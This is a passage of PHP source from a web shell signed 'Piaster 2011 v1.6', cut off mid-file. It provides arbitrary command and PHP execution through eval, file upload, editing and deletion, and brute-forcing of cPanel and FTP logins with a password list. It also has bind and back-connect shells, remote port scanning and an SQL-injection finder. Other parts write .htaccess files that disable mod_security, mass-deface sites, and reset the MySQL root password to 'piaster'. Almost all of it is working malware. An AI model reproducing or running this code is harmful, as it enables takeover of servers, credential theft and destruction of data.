  458. { echo ("<p class=\"error\">Error moving uploaded file ".$_FILES["dfill"]["tmp_name"]." to the $up_fp</p>\n");
  459. echo ("<p>Check the directory permissions for $up_d (must be 777)!</p>\n");icod();}else
  460. { echo ("<p class=\"success\">Uploaded file saved as $up_fn</p>\n");}}else
  461. { echo ("<p class=\"error\">Error uploading file ".$_FILES["dfill"]["name"]."</p>\n");}}
  462. echo "<div align = center>";
  463. if (isset($_REQUEST["mkD"]))
  464. {
  465. if (file_exists(htmlspecialchars($_POST['mKd'])))
  466. {echo "Make Dir: \"".htmlspecialchars($_POST['mKd'])."\" Dir alredy exists";}
  467. elseif (!@mkdir(htmlspecialchars($_POST['mKd']),0777))
  468. {echo "Make Dir \"".htmlspecialchars($_POST['mKd'])."\" access denied";}
  469. else {echo "Dir :".htmlspecialchars($_POST['mKd'])."Created Done"; }
  470. }
  471. if (isset($_REQUEST["mkF"]))
  472. {
  473. if (file_exists($mkfile))
  474. {echo "<b>Make File: \"".htmlspecialchars($_POST['mKf'])."\" File alredy exists";}
  475. elseif (!@fopen(htmlspecialchars($_POST['mKf']), "wb"))
  476. {echo "<b>Make File: \"".htmlspecialchars($_POST['mKf'])."\" access denied";}
  477. else {echo "<b>File:".htmlspecialchars($_POST['mKf'])."Created Done";}
  478. }
  479. if(isset($_REQUEST["chfl"])){
  480. $ftc = htmlspecialchars($_POST['cfx']);
  481. $ftx = $_POST['cfy'];
  482. echo $ftc.$ftx;
  483. switch($_POST['ch'])
  484. {
  485. case 'cm':
  486. if(@chmod($ftc,$ftx)){echo "File: &nbsp;".$ftc."&nbsp;CH to |&nbsp;".$ftx;}else echo "&nbsp;dosen't exists or you don't have
  487. access";break;case 'co':
  488. if(@chown($ftc,$ftx)){echo "File: &nbsp;".$ftc."&nbsp;CH to |&nbsp;".$ftx;}else echo "&nbsp;dosen't exists or you don't have
  489. access";break;case 'cg':
  490. if(@chgrp($ftc,$ftx)){echo "File: &nbsp;".$ftc."&nbsp;CH to |&nbsp;".$ftx;}else echo "&nbsp;dosen't exists or you don't have
  491. access";break;case 'cu':if(@unlink($ftc)){echo "File:&nbsp; ".$ftc." &nbsp;Removed";}else echo "&nbsp;dosen't exists or you don't haveaccess";break;}}
  492. if(isset($_REQUEST["upff"]))
  493. {
  494. $ft1 = htmlspecialchars($_POST['upf']);
  495. $cod = htmlspecialchars($_POST['code']);
  496. fmas($ft1,$cod);
  497. }
  498. function fmas($dir,$codm)
  499. {
  500. $han = @fopen($dir,"w+");
  501. @fwrite($han, $codm);
  502. if(@fclose($han)){echo "File&nbsp;".$ft1."&nbsp;Uploaded";}else {echo "Noop!";}
  503. }
  504. switch(true){
  505. case(oP == '7'):{ mailr_s();}break;
  506. case(oP == '9'):{ccf();}break;
  507. case(oP == '11'):{ htc();}break;
  508. case(oP =='12'):{zh();}break;
  509. case(oP =='15'):{ sear();}break;
  510. case (oP == '14'||isset($_REQUEST["crtty"])):{hashw();exit();}break;
  511. case(oPp == '3'):{rs('cfed','141','22',$st='readonly');show_users();echo "</textarea>";}break;
  512. case(oPp =='5'):{ sqlinj();}break;
  513. case(oPp == '6'):{ ps5s();}break;
  514. case(oPp == '7'):{ extr_i();}break;
  515. case(isset($_REQUEST["evap"])):{
  516. rs('cfed','141','22',$st='readonly');
  517. $sd = stripcslashes($_POST['evac']);
  518. @eval($sd);
  519. echo "</textarea>";}break;
  520. case(isset($_REQUEST["gotod"])):
  521. {
  522. rs('cmdm','141','22',$st='readonly');
  523. $path =htmlspecialchars($_POST['goto']);
  524. $dih = @opendir($path) or die("<br><b>Permision denied! Unable to open dir $path");
  525. if(wdll_chf())echo wdll_cmdf('dir');else htmlspecialchars(htmlspecialchars(wdll_updir($dih, $path)));
  526. echo "</textarea>";}break;
  527. case(isset($_REQUEST["finds"])):
  528. {$pathh =htmlspecialchars($_POST['goto']);
  529. $fin = htmlspecialchars($_POST['fin']);echo "Find File = &nbsp;".$fin."&nbsp;&nbsp;Dir = &nbsp;".$path ;
  530. rs('cmdm','141','22',$st='readonly');
  531. $dih = @opendir($pathh) or die("<br><b>Permision denied! Unable to open dir $path");
  532. echo wdll_nora($dih,$pathh,$fin);
  533. echo "</textarea>";}break;
  534. case (isset($_REQUEST["mvdi"])):{rs('cmdm','141','22',$st='readonly');
  535. $cop = true;
  536. $mvdir = htmlspecialchars($_POST['movd']);
  537. $dst = htmlspecialchars($_POST['destd']);
  538. if(!empty($_POST['rvm'])){$cop = false;}
  539. md($mvdir,$dst,$cop);echo "</textarea>";
  540. }break;
  541. case(isset($_REQUEST["gip"])):
  542. {echo "<br>SQL INJECTION FOUNDER<br>";
  543. rs('cmdm','141','22',$st='readonly');
  544. echo sqlj_do($_REQUEST["ipp"]);
  545. echo "</textarea>";
  546. echo "<p align=\"center\"><a href=\"javascript: history.go(-1)\">Back</a></p>"; ft(); die;
  547. }break;
  548. case(isset($_REQUEST["gfil"]) || isset($_REQUEST['gfils'])|| isset($_REQUEST['show'])):
  549. {echo "<form name=\"savf\" action=\"".$php."\"method=\"post\">";
  550. rs('cfed','141','22');
  551. if($_GET['show']) {$pos = @base64_decode(htmlspecialchars($_REQUEST['show']));
  552. if(function_exists('file_get_contents'))
  553. {echo @file_get_contents($pos);}
  554. elseif(function_exists('file'))
  555. {echo @file($pos);}
  556. elseif(function_exists('fread')){$x5 = @fopen($pos,'rw');$dc = @fread($x5,@filesize($pos));@fclose($x5);}
  557. else {rf();} echo "</textarea>";inp('hidden','50','goto',path);
  558. inp('hidden','50','svdi',$pos,'','<br>');
  559. sub('svff','Save',$pr='<br>');exit;}
  560. elseif(isset($_REQUEST['gfils'])){$pos = $HTTP_POST_VARS['cfils'];sqlf($pos);}
  561. else {$pos = $HTTP_POST_VARS['cfil'];}
  562. switch($_REQUEST['getm']){
  563. case('1'):{{$x5 = @fopen($pos,'rw');$dc = @fread($x5,@filesize($pos));@fclose($x5);echo $dc;}}break;
  564. case('2'):{echo rf();}break;
  565. case('3'):{if(function_exists('file_get_contents')){echo @file_get_contents($pos);}}break;}
  566. echo "</textarea>";
  567. inp('hidden','50','goto',path);
  568. inp('hidden','50','svdi',$pos,'','<br>');
  569. sub('svff','Save',$pr='<br>');}break;
  570. case(isset($_REQUEST['cmdr'])):{
  571. rs('cmdm','141','22',$st='readonly');
  572. $pos = $_POST['cmde'];
  573. echo wdll_cmdf($pos);
  574. echo "</textarea>";}break;
  575. case(isset($_REQUEST['aliA'])) :{
  576. $alis = $_REQUEST['alI'];
  577. define('dir',$alis);
  578. echo "Command: &nbsp;".$alis."<br>";
  579. rs('cmdm','141','22',$st='readonly');
  580. echo wdll_cmdf($alis);
  581. echo "</textarea>";}break;
  582. case(isset($_REQUEST['spots'])):{
  583. rs('cmdm','141','22',$st='readonly');
  584. ps();
  585. echo "</textarea>";
  586. echo "<p align=\"center\"><a href=\"javascript: history.go(-1)\">Back</a></p>"; ft(); die;}break;
  587. case(isset($_REQUEST['crcf'])):{if(!curc())die("Curl Not Avilable on this Server Can.t complete opration!");else{
  588. $prt=$_REQUEST['port'];
  589. $us=$_REQUEST['uses'];
  590. $pa=$_REQUEST['pass'];
  591. $sit=$_REQUEST['site'];
  592. $crt=$_REQUEST['crt'];
  593. if($crt == ""){echo "\nERORR: Chois Crack Type Cpanel OR FTP ?\n";
  594. echo "<a href=\"javascript: history.go(-1)\">Back</a>";die;}
  595. echo "Crack Type:&nbsp;".$_REQUEST['crt']."\n[~] Cracking Process Started, Please Wait ...\n";
  596. rs('cmds','141','22',$st='readonly');
  597. $us=explode("\n",$us);
  598. $pa=explode("\n",$pa);
  599. echo "Crack Type:&nbsp;".$_REQUEST['crt']."\n[~] Cracking Process Started, Please Wait ...\n";
  600. if($sit == ""){$sit = "localhost";}
  601. if($prt == ""){$prt = "2082";}
  602. foreach ($us as $u){$usr = trim($u);
  603. foreach ($pa as $p ){$pwd = trim($p);
  604. if($crt == "FTP"){echo fc($sit,$usr,$pwd,$tl);}
  605. if ($crt == "Cpanel"){echo cc($sit,$prt,$usr,$pwd,$tl);}}}
  606. echo "\n[~] Cracking Process Done!\n";
  607. echo "</textarea>";unset($crcf);}}break;
  608. case(isset($_REQUEST['dhtc'])):{
  609. $ctc = htmlspecialchars($_POST['htc']);
  610. $clc = htmlspecialchars($_POST['mhtc']);
  611. rs('cmds','141','22',$st='readonly');
  612. switch($_REQUEST['htcc']){
  613. case('ch'):{$hd = @fopen(".htaccess","w+");@fwrite($hd,$clc);if(@fclose($hd)){echo "[+] Htaccess Created!";}}break;
  614. case('cpp'):{$hd = @fopen(".htaccess","w+");@fwrite($hd,"AddType application/x-httpd-php4 .php");if(@fclose($hd)){echo "[+] Htaccess Created!";}}break;
  615. case('cpe'):{$hd = @fopen(".htaccess","w+");@fwrite($hd,"<FileMatch '^.*\.$ctc>\r\nSetHandler application/x-httpd-php\r\n</FilesMatch>");if(@fclose($hd)){echo "[+] Htaccess Created!";}}break;
  616. case('cre'):{$hd = @fopen(".htaccess","w+");@fwrite($hd,"Options ExecCGI\r\nAddType application/x-httpd-cgi .$ctc\r\nAddHandler cgi-script .".$ctc);if(fclose($hd)){echo "[+] Htaccess Created!";}}break;
  617. case('fis'):{$hd = @fopen(".htaccess","w+");@fwrite($hd,"<IfModule mode_security.c>\r\nSecFilterEngine Off\r\nSecFilterScanPOST Off\r\n</IfModule>");if(fclose($hd)){echo "[+] Htaccess Created!";}}break;
  618. case('cpi'):{$hd = @fopen("php.ini","w+");@fwrite($hd,$clc);if(@fclose($hd)){echo "[+] PHP.ini Created!";}}break;}
  619. echo "</textarea>";unset($dhtc);}break;
  620. case(isset($_REQUEST['zhsd'])): {rs('cmds','141','18',$st='readonly');
  621. if(!curc())die("Curl Not Avilable on this Server Can.t complete opration!");else{
  622. $hnam = htmlspecialchars($_POST['hname']);
  623. $htype = htmlspecialchars($_POST['htype']);
  624. $hwhy = htmlspecialchars($_POST['hwhy']);
  625. $hsts = htmlspecialchars($_POST['sts']);
  626. $hdo= explode("\n", $hsts);
  627. foreach ($hdo as $uu){$sitss = trim($uu);
  628. echo zhsr($hnam,$htype,$hwhy,$sitss);}
  629. }echo "</textarea>";unset($zhsd);}break;
  630. case (isset($_REQUEST["ext_si"])) : {
  631. rs('cmds','141','22',$st='readonly');
  632. extr_si();
  633. echo "</textarea>"; echo "<br><br><a href=\"".$php."\">Home</a>|&nbsp;|<a href=\"javascript: history.go(-1)\">Back</a><br>";ft();exit();}break;
  634. case (isset($_REQUEST['urlup'])):
  635. {rs('cmds','141','22',$st='readonly');
  636. $url = htmlspecialchars($_POST['urlf']);
  637. $file = htmlspecialchars($_POST['localf']);
  638. $pathf = htmlspecialchars($_POST['pathf']);
  639. if(fetchFilef($url,$pathf,$file)) {echo "[+]Uploaded file saved as ". path.'/'.$file;}else
  640. {echo "[+] Check the directory permissions for (must be 777)!\nor \nCheck URL!";}
  641. echo "</textarea>";unset($urlup);}break;
  642. case(isset($_REQUEST['crypfl'])||isset($_REQUEST['crypo'])):
  643. {rs('ccrt' ,'141','22',$st='');
  644. if(isset($_REQUEST['crypo']))
  645. $file=@fopen($_FILES['userfile']['tmp_name'],"r") or die ("[-]Error reading file!");
  646. $meth=$_POST['crypt'];if ($meth=="1") {echo stripcslashes(md5(@fread($file,100000)));} elseif ($meth=="2") {echo stripcslashes(crypt(@fread($file,100000)));}
  647. elseif ($meth=="3") {echo stripcslashes(sha1(@fread($file,100000)));}
  648. elseif ($meth=="4") {echo stripcslashes(crc32(@fread($file,100000)));}
  649. elseif ($meth=="5") {echo stripcslashes(urlencode(@fread($file,100000)));}
  650. elseif ($meth=="6") {echo stripcslashes(urldecode(@fread($file,100000)));}
  651. elseif ($meth=="7") {echo stripcslashes(@base64_encode(@fread($file,100000)));}
  652. elseif ($meth=="8") {echo stripcslashes(@base64_decode(@fread($file,100000)));}
  653. echo "</textarea><div align=left>";echo '<br><form enctype="multipart/form-data" method="post"><b>File:<br><input name="userfile" type="file"><br><br><input type="submit" value="Crypt" name="crypo"><br><br><hr><input type=radio name=crypt value=1>md5();<br><hr><input type=radio name=crypt value=2>crypt();<br><hr><input type=radio name=crypt value=3>sha1();<br><hr><input type=radio name=crypt value=4>crc32();<br><hr><input type=radio name=crypt value=5>urlencode();<br><hr><input type=radio name=crypt value=6>urldecode();<br><hr><input type=radio name=crypt value=7>base64_encode();<br><hr><input type=radio name=crypt value=8>base64_decode();<br>';echo "<hr><div align =\"center\"><br><br><a href=\"javascript: history.go(-1)\">Back</a>";echo "<p align=\"center\"><a href=\"".$php."\">Home</a><br></p>";
  654. exit;
  655. }break;
  656. case(oP == '8'):{ indexc();exit();}break;
  657. case(oPp == '1'):{ vbsql();exit();}break;
  658. case(oPp == '2'):{ backc();}break;
  659. case(oPp == '4' || $_REQUEST['piasS']):{
  660. if($win) {
  661. define('STDIN',@fopen("php://stdin","r"));
  662. $input = trim(@fgets(STDIN,256));
  663. $input = ereg_replace('\"', "\\\"", $input);
  664. $input = ereg_replace('\'', "\'", $input);
  665. echo "| |<a href=\"".$php."\">Home</a></p>";
  666. if(wdll_chf()) wdll_cmdf("net stop mysql");
  667. if(wdll_chf()) wdll_cmdf('start /b C:\AppServ\MySQL\bin\mysqld-nt.exe --skip-grant-tables --user=root');
  668. if(wdll_chf()) wdll_cmdf("C:\AppServ\MySQL\bin\mysql -e \"update mysql.user set PASSWORD=PASSWORD('piaster') where user = 'root';\"");
  669. if(wdll_chf()) {wdll_cmdf("C:\AppServ\MySQL\bin\mysqladmin -u root shutdown");
  670. echo '<br> Please wait ................................... Goodluck ...Win phpMyAdmin Hacked :: <br>USER: root & PASSWORD: piaster<br><br><br><p align="center"><a href="javascript: history.go(-1)">Back</a>';}else echo " I think function disable or Path: 'C:\AppServ\MySQL ' not found on this server edit Path..Bug only in AppServ about www.appservnetwork.com";
  671. sleep(3);
  672. if(wdll_chf()) wdll_cmdf("net start mysql");}
  673. if(!$win) {
  674. echo '<form action="#" method="post">';
  675. inp('input','20','dbu',$_REQUEST['dbu'],$ti='user',$pr='');
  676. inp('input','20','dbp',$_REQUEST['dbp'],$ti='password',$pr='');
  677. inp('input','20','dbh',$_REQUEST['dbh'],$ti='host',$pr='');
  678. sub('piasS','GO',$pr='');
  679. echo '</form>';
  680. if(isset($_REQUEST['piasS'])){
  681. $dbu = $_REQUEST['dbu'];
  682. $dbp = $_REQUEST['dbp'];
  683. $dbh = $_REQUEST['dbh']? $_REQUEST['dbh'] : 'localhost';
  684. $conn = @mysql_connect($dbh, $dbu, $dbp);
  685. $select = @mysql_select_db('mysql', $conn);
  686. if (!$select) {
  687. echo @mysql_error();}
  688. $t1 = "UPDATE mysql.user set PASSWORD=PASSWORD('piaster') where user = 'root';";
  689. $go1 = @mysql_query( $t1 , $conn);
  690. if($go1){echo '<center><br>Goodluck ... Lunix phpMyAdmin Hacked :: Now Wait Until Mysql Restart and Come back with USER: root & PASSWORD: piaster<br><br><br><p align="center"><a href="javascript: history.go(-1)">Back</a></p></center>';
  691. echo "| |<a href=\"".$php."\">Home</a>";}
  692. }}exit();}break;
  693. case(isset($_REQUEST['vbsq'])):{ vb_opt();exit();}break;
  694. case(oP == 6):{
  695. //echo "<hr color= #993333>";
  696. rs('cmds','120','20',$st='readonly');
  697. if(wdll_chf()){ if(!$win){echo wdll_cmdf('ls -la');}else echo wdll_cmdf('dir');}else
  698. {$dih = @opendir(path) or die("<br><b>Permision denied! Unable to open dir $path");
  699. wdll_updir($dih, path);}
  700. echo "</textarea>"; }break;
  701. default:{echo "<font color = orange>
  702. Hello <br>
  703. I hope you will find useful tool to perform your job properly<br>
  704. Also heal myself if your use of it in harm to people <br>
  705. Always remember<br>
  706. Easy Come Easy Go.<br>
  707. Piaster 2011 v1.6<br>
  708. ";}//---------------------------------
  709. }
  710. echo " <table>";
  711. if($_REQUEST['wbp']){bbc($_REQUEST['wbcp']);}
  712. if($_REQUEST['lbg']){bbc($_REQUEST['lbcp']);}
  713. if($_REQUEST['bpg'] ){bbc($_REQUEST['bcpo'],$_REQUEST['bcip']);}
  714. echo "<br>" ;sl();
  715. echo "<br><br>";
  716. echo "<table><tr><td>";
  717. //echo "<hr color= #993333>";
  718. cm_ge(); echo "</td><td>";
  719. //echo "<hr color= #993333>";
  720. cm_gee();echo "</td></tr></table>";echo "<hr color= #993333>";
  721. if (oP == '13' || !empty($_POST['evac'])) {echo eva();}
  722. else db_lg() ;echo "<br>";urlp();echo "<hr color = #993333><br>"; movdr();
  723. echo "<hr color = #993333></div>";
  724. echo "</table>";
  725. function mailr_s(){
  726. echo "<form name=\"savf\" action=\"".$php."\"method=\"post\">";
  727. inp('text','30','mnam',$_REQUEST['mnam'],'Your name: ','');
  728. inp('text','30','mmail',$_REQUEST['mmail'],'Your e-mail: ','');
  729. inp('text','30','mito',$_REQUEST['mito'],'To: ','');
  730. inp('text','30','msubj',$_REQUEST['msubj'],'Subject: ','<br>');
  731. are('mmsg',$_REQUEST['mmsg'],'80','8',$st ='',$pr ='<br><br><br><br>');
  732. sub('mSendm','Send');}
  733. function sear(){
  734. echo "<br><br><table bgcolor=black border = 1><tr><td><form action=\"".$php."\"method=\"post\">";
  735. echo 'Path<br>';
  736. inp('text','63','serdir',path,'','<br>');
  737. echo '<br>';
  738. echo 'Search DIR<br>';
  739. inp('text','32','sedir','include','','<br>');
  740. inp('radio','10','sea','cedr','Directory only','<br>');
  741. echo '<br><div align = left>';
  742. echo '<br>Key word';
  743. are('searcc','','60','5',$pr ='<br>',$id='');
  744. echo '<br>';
  745. inp('radio','10','sea','cepr','Preg_Match &nbsp; (Regular expressions)(into file)','<br>');
  746. inp('radio','10','sea','cewo','words only &nbsp; (into file)','<br>');
  747. inp('radio','10','sea','cefn','File Name &nbsp; (same key word ex: config.php)','<br>');
  748. inp('radio','10','sea','cefi','File Name &nbsp; (include yo key word)(min char = 3)','<br>');//
  749. inp('radio','10','sea','cefm','File Mode &nbsp; (like 666 ,777 ...etc)','<br>');
  750. inp('radio','10','sea','ceft','File Type &nbsp; (like php,txt ...etc)','<br><br>');
  751. echo '<div align = center>';
  752. sub('search','Search');
  753. echo '</form></div></ts></tr></table>';
  754. echo "<br><a href=\"".$php."\">Home</a><p align=\"center\"><a href=\"javascript: history.go(-1)\">Back</a></p>"; ft(); die;}
  755. function hashw()
  756. { $crtf = $_POST['crrt'];echo "<form action=\"".$php."\"method=\"post\">";
  757. are('crrt',stripcslashes($crtf),'80','8','<br>',$id='');echo "<br><br><br><table width = \"100\" border=1 bgcolor =\"000000\" ><tr>";echo '<td>md5:</td><td>';
  758. inp('text','80','cc',stripcslashes(@md5($crtf)),'','<br>');echo "</td></tr>";echo '<td>crypt:</td><td>';
  759. inp('text','80','cc',stripcslashes(@crypt($crtf)),'','<br>');echo "</td></tr>";echo '<td>sha1:</td><td>';
  760. inp('text','80','cc',stripcslashes(@sha1($crtf)),'','<br>'); echo "</td></tr>";echo '<td>crc32:</td><td>';
  761. inp('text','80','cc',stripcslashes(@crc32($crtf)),'','<br>'); echo "</td></tr>";echo '<td>urlencode:</td><td>';
  762. inp('text','80','cc',stripcslashes(@urlencode($crtf)),'','<br>'); echo "</td></tr>";echo '<td>urldecode:</td><td>';
  763. inp('text','80','cc',stripcslashes(@urldecode($crtf)),'','<br>');echo "</td></tr>";echo '<td>base64_encode:</td><td>';
  764. inp('text','80','cc',stripcslashes(@base64_encode($crtf)),'','<br>'); echo '</td>';echo "</td></tr>";echo '<td>base64_decode:</td><td>';
  765. inp('text','80','cc',stripcslashes(@base64_decode($_POST['crrt'])),'','<br>'); echo "</td></tr>";echo '</tr>';echo '<br><br>';
  766. echo '</td>';echo "</td></tr>";echo '<td>dec2hex:</td><td>';
  767. $c = strlen($crtf); for($i=0;$i<$c;$i++) { $hex = dechex(ord($crtf[$i])); if ($crtf[$i] == "&")
  768. {echo $crtf[$i];} elseif ($crtf[$i] != "\\") {echo "%".$hex;}}
  769. echo '</table>';
  770. sub('crtty','Crypt','');echo '&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;';sub('crypfl','Crypt File');echo '<br><br>';
  771. echo "<a href=\"javascript: history.go(-1)\">Back</a></div><hr>";echo "<p align=\"center\"><a href=\"".$php."\">Home</a><br></p>";}
  772. function extr_i(){
  773. echo "<form action=\"".$php."\"method=\"post\">";
  774. inp('text','50','sqtid','','IP/HOST:');
  775. sub('ext_si','Extract!','<br>');
  776. echo "</form>";
  777. }
  778. function indexc()
  779. {$xq = 'UPDATE "dbname".template name SET template name = "index code" WHERE title = "field title"';
  780. echo "<form action=\"".$php."\" method=\"post\">
  781. <div align =\"center\"><b>Index Code</b>";
  782. are('coded','Post your code here','50','20','<br>');
  783. echo '<div align=left>';
  784. echo "<b>File Options</b><br><hr color=black>";
  785. inp('text','40','masdr',path,'Path');echo '&nbsp;&nbsp;';inp('text','20','skid','Dir name','Skip Dir');echo "<br>";
  786. inp('radio','10','msi','msfi','Just indexes','<br>');
  787. inp('radio','10','msi','msfa','all files','<br>');
  788. inp('radio','10','msi','msfr','Remove all without indexes');
  789. echo "<hr color=black><b>DataBase options</b><br>";
  790. echo "<br>";
  791. inp('radio','10','msi','msvb','VB','<br>');
  792. inp('radio','10','msi','msbb','MyBB','<br>');
  793. inp('radio','10','msi','msin','Infinty','<br>');
  794. inp('radio','10','msi','mswp','WordPress','<br>');
  795. inp('radio','10','msi','msjo','Jomla','<br>');
  796. inp('radio','10','msi','msrd','Remove DB!','<br>');
  797. inp('radio','10','msi','msot','Other | index code = $coded','<br>');
  798. inp('text','100','msqur',$xq,'Query:');echo "<br><br>";
  799. inp('text','15','sqdbn',$n,'DBname:');
  800. inp('text','15','sqlog',$u,'DBuser:');
  801. inp('text','15','sqpwd',$p,'DB_PWD:');
  802. inp('text','13','sqsrv','localhost','HOST:');
  803. inp('text','13','sqprt','3306','PORT:');
  804. echo "<hr color=black><br><br><div align =\"center\">";
  805. sub('massa','Mass Index!','<br>');
  806. echo "</form>";
  807. echo "<a href=\"".$php."\">Home</a><br><br>";exit;}
  808. function sqlinj(){
  809. echo "<center>FIND SQL INJECTION ON OTHER REMOTE SERVER <BR>";
  810. echo "<form name=\"site\" action=\"".$php."\"method=\"post\">";
  811. inp('text','20','ipp','',' IP ','<br><br>');
  812. sub('gip','&nbsp;Find SQL Inj','<br>');
  813. echo "</form>";
  814. }
  815. function ccf(){
  816. $wrdlist= "1234556 \n987654321\n963852741\n321654\n987654321\n963741\n951753\n852654\n987321\n321987951753";
  817. if(wdll_chf()){$userlist = wdll_cmdf('ls /var/mail');}else $userlist ="users";
  818. echo "<form action=\"".$php."\"method=\"post\"><br><br>";
  819. $loca = $_SERVER['SERVER_NAME'];
  820. inp('text','30','site',$loca,'HOST/IP');
  821. inp('text','5','port','2082','Port','<br>');
  822. if(!empty($_REQUEST['uses'])){ $userlist = $_REQUEST['uses'];}
  823. echo "<table><tr><td>";
  824. are('uses',$userlist,'10','20',$pr ='');echo "</td><td>";
  825. if(!empty($_REQUEST['pass'])){$wrdlist = $_REQUEST['pass'];}echo "</td><td>";
  826. echo "<textarea id='passw' name='pass' cols='10'rows='20' onselect='cp()' onchange='cp()' onkeydown='cp()' onkeyup='cp()' onchange='cp()'>".$wrdlist."</textarea>";
  827. echo "</td></tr></table>";
  828. echo "<br>
  829. <b>Password Number : <span id='pn'>0<br></span>
  830. <span><font color=orange><b>Split The Password List By:</font></span><br>
  831. <input name='textml' id='spl' type='text' value=',' size='5'/>
  832. <input type='button' onclick='psplit()' value='Split'>";
  833. echo "<br><br>";
  834. inp('radio','10','crt','cp','Cpanel [2082]');
  835. inp('radio','10','crt','FTP','FTP [21]','<br>');
  836. echo "<br>";
  837. sub('crcf','Crack');
  838. echo "</form>";
  839. echo "<br><a href=\"".$php."\">Home</a><br><br>";
  840. ?>
  841. <body onload="cp">
  842. <script type="text/javascript">
  843. window.onload = pchange;
  844. var xy = false;
  845. function psplit(){
  846. var yx = document.getElementById("passw").value;
  847. var yz = document.getElementById("spl").value;
  848. var nora=new Array();
  849. nora = yx.split(yz);
  850. document.getElementById("passw").value="";
  851. var i;
  852. for(i=0;i<nora.length;i++){
  853. document.getElementById("passw").value += nora[i]+"\n";}
  854. cp();}
  855. function cp(){
  856. var etext = document.getElementById("passw").value;
  857. var nora=new Array();
  858. nora = etext.split("\n");
  859. document.getElementById("pn").innerHTML=nora.length+"<br />";
  860. if(!xy && nora.length > 50000){
  861. alert('If passwords list More Than 50000 passwords This May Hang The Server');
  862. xy = true;}}</script>
  863. <?php
  864. exit();}
  865. function backc(){
  866. echo "<form action=\"".$php."\"method=\"post\">";
  867. inp('text','20','bcip',$_SERVER['REMOTE_ADDR'],'IP:');
  868. inp('text','10','bcpo','1985','Port');
  869. sub('bpg','Connect!','<br><br>');
  870. echo 'Lunix Bind Port <br>';
  871. inp('text','10','lbcp','1985','Port');
  872. sub('lbg','Connect!','<br><br>');
  873. echo 'Win Bind Port<br>';
  874. inp('text','10','wbcp','1985','Port');
  875. sub('wbp','Connect!');
  876. echo "</form>";
  877. echo "<p align=\"center\"><a href=\"javascript: history.go(-1)\">Back</a><center><br></p>";}
  878. function urlp(){
  879. echo "<form action=\"".$php."\"method=\"post\">";
  880. inp('text','50','urlf','http://www.','URL:');
  881. inp('text','50','pathf',path,'Path');
  882. inp('text','10','localf','wdll.zip','Save as');
  883. sub('urlup','Upload!');
  884. echo "</form>";}
  885. function ps5s(){
  886. echo "<form action=\"".$php."\"method=\"post\">";
  887. inp('text','30','hot','IP/Domain');
  888. inp('text','8','spot','1','FROM');
  889. inp('text','8','epot','100','TO');
  890. sub('spots','Scan');
  891. echo "</form>";
  892. }
  893. function ch()
  894. {
  895. echo "<select name=ch>
  896. <option value=cm>CHMOD</option>
  897. <option value=co>CHOWN</option>
  898. <option value=cg>CHGRP</option>
  899. <option value=cu>Unlink</option>
  900. </select>";inp('text','44','cfx',path);inp('text','8','cfy','0666');sub('chfl','Ok');}
  901. function movdr(){
  902. echo "<form action=\"".$php."\"method=\"post\">";
  903. inp('checkbox','','rvm','remov','Remove dir after copy');
  904. inp('text','50','movd',path,'FROM');inp('text','47','destd',path,'TO');
  905. sub('mvdi','Move');echo "</div>";
  906. echo "</form>";}
  907. function eva()
  908. {echo "<form action=\"".$php."\"method=\"post\">";
  909. $valo = '//unlink G5.php';
  910. are('evac',$valo,'125','5',$st ='',$pr ='<br><br><br><br>');
  911. sub('evap','Run PHP Code',$pr='<br>');echo "</form>";}
  912. function sk_ju()
  913. {inp('checkbox','50','Ski','Ski','Skip');
  914. inp('checkbox','50','Jum','Jum','Jump');
  915. inp('text','20','askid','uploads','DIR');}
  916. function cm_ge()
  917. {$aliss = '';
  918. $aliss = dir;
  919. echo "<form method=\"POST\" action=\"".$php."\" enctype=\"multipart/form-data\">";
  920. echo "<table dir =left border=1 bgcolor =\"000000\" ><tr><td>Execute</td><td>";
  921. inp('text','55','cmde',$aliss,'');sub('cmdr','CMD',$pr='<br>');echo "</td></tr>";
  922. echo "<tr><td> Get File</td><td>";
  923. echo"<select size=\"1\" name=\"getm\" title=\"FileS Action\" >
  924. <option value=\"2\">Mode [0]</option>
  925. <option value=\"1\">Mode [1]</option>
  926. <option value=\"3\">Mode [2]</option>
  927. </select>";
  928. if(isset($HTTP_POST_VARS['cfil']))$oop = $_POST['cfil'];else $oop = path;
  929. inp('text','42','cfil',$oop,'');sub('gfil','&nbsp;Get ','<br>');echo "</td></tr>";
  930. echo "<tr><td>Go Dir</td><td>";
  931. inp('text','55','goto',path,'');sub('gotod',' Go &nbsp;','<br>');echo "</td></tr>";
  932. echo "<tr><td>Locate</td><td>";
  933. inp('text','55','fin','config.php','');sub('find','Find');echo "</td></tr>";
  934. echo "<tr><td>Upload</td><td>";
  935. inp('hidden','55','MAX_FILE_SIZE',$umf,'');
  936. ec

Large files files are truncated, but you can click here to view the full file